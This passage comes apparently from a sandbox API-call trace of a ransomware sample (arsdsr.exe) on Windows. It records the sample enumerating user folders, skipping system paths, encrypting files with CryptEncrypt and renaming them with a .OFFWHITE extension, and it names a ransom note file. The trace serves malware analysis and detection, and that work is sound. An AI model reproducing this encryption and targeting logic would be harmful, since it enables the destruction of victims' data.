(lpString1="Downloads.lnk", lpString2="programdata") returned -1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="appdata") returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="program files") returned -1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="program files (x86)") returned -1 [0134.483] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.483] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Downloads.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0134.483] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.483] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0134.483] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0134.483] lstrcmpiW (lpString1="Downloads.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.483] GetProcessHeap () returned 0x500000 [0134.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531780 [0134.483] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.484] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=929) returned 1 [0134.484] GetProcessHeap () returned 0x500000 [0134.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.484] GetProcessHeap () returned 0x500000 [0134.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.484] GetProcessHeap () returned 0x500000 [0134.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.484] GetProcessHeap () returned 0x500000 [0134.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.484] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.484] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.485] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.485] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.485] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.485] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.485] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.485] SetLastError (dwErrCode=0x0) [0134.485] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.552] GetLastError () returned 0x0 [0134.552] GetLastError () returned 0x0 [0134.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.553] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x5a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.553] WriteFile (in: hFile=0xb0, lpBuffer=0x531780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531780*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.553] GetProcessHeap () returned 0x500000 [0134.553] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3a1) returned 0x521ec8 [0134.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.553] ReadFile (in: hFile=0xb0, lpBuffer=0x521ec8, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x521ec8*, lpNumberOfBytesRead=0x295e540*=0x3a1, lpOverlapped=0x0) returned 1 [0134.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.553] WriteFile (in: hFile=0xb0, lpBuffer=0x521ec8*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521ec8*, lpNumberOfBytesWritten=0x295e54c*=0x3a1, lpOverlapped=0x0) returned 1 [0134.553] GetProcessHeap () returned 0x500000 [0134.553] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x521ec8 | out: hHeap=0x500000) returned 1 [0134.553] CloseHandle (hObject=0xb0) returned 1 [0134.555] GetProcessHeap () returned 0x500000 [0134.555] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.555] GetProcessHeap () returned 0x500000 [0134.555] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.555] GetProcessHeap () returned 0x500000 [0134.555] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.555] GetProcessHeap () returned 0x500000 [0134.555] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.555] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0134.555] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.OFFWHITE" [0134.555] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.offwhite")) returned 1 [0134.556] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2=".") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="..") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="...") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="windows") returned -1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$recycle.bin") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="rsa") returned -1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="ntuser.dat") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="programdata") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="appdata") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="program files") returned 1 [0134.556] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="program files (x86)") returned 1 [0134.556] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.557] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="RecentPlaces.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0134.557] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.557] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.557] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0134.557] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0134.557] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.557] GetProcessHeap () returned 0x500000 [0134.557] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531790 [0134.559] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.581] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=363) returned 1 [0134.581] GetProcessHeap () returned 0x500000 [0134.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.581] GetProcessHeap () returned 0x500000 [0134.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.581] GetProcessHeap () returned 0x500000 [0134.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.581] GetProcessHeap () returned 0x500000 [0134.581] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.581] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.581] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.581] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.582] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.582] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.582] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.582] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.582] SetLastError (dwErrCode=0x0) [0134.582] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.584] GetLastError () returned 0x0 [0134.584] GetLastError () returned 0x0 [0134.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x26b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.584] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.584] WriteFile (in: hFile=0xb0, lpBuffer=0x531790*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531790*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.584] GetProcessHeap () returned 0x500000 [0134.584] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16b) returned 0x52b858 [0134.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.584] ReadFile (in: hFile=0xb0, lpBuffer=0x52b858, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesRead=0x295e540*=0x16b, lpOverlapped=0x0) returned 1 [0134.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.584] WriteFile (in: hFile=0xb0, lpBuffer=0x52b858*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesWritten=0x295e54c*=0x16b, lpOverlapped=0x0) returned 1 [0134.585] GetProcessHeap () returned 0x500000 [0134.585] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52b858 | out: hHeap=0x500000) returned 1 [0134.585] CloseHandle (hObject=0xb0) returned 1 [0134.589] GetProcessHeap () returned 0x500000 [0134.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.589] GetProcessHeap () returned 0x500000 [0134.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.589] GetProcessHeap () returned 0x500000 [0134.589] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.590] GetProcessHeap () returned 0x500000 [0134.590] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.590] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0134.590] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.OFFWHITE" [0134.590] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.offwhite")) returned 1 [0134.590] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0134.591] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0134.591] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="...") returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="$recycle.bin") returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="rsa") returned -1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="ntuser.dat") returned -1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="programdata") returned -1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="appdata") returned 1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="program files") returned -1 [0134.591] lstrcmpiW (lpString1="Local Settings", lpString2="program files (x86)") returned -1 [0134.591] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0134.591] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0134.591] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0134.591] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0134.591] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0134.591] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0134.592] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdba02e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdba02e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Music", cAlternateFileName="")) returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="...") returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="$recycle.bin") returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="rsa") returned -1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="programdata") returned -1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="appdata") returned 1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="program files") returned -1 [0134.592] lstrcmpiW (lpString1="Music", lpString2="program files (x86)") returned -1 [0134.592] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0134.592] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music" [0134.592] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.592] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0134.592] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0134.592] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdba02e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdba02e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0134.596] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.596] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdba02e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, 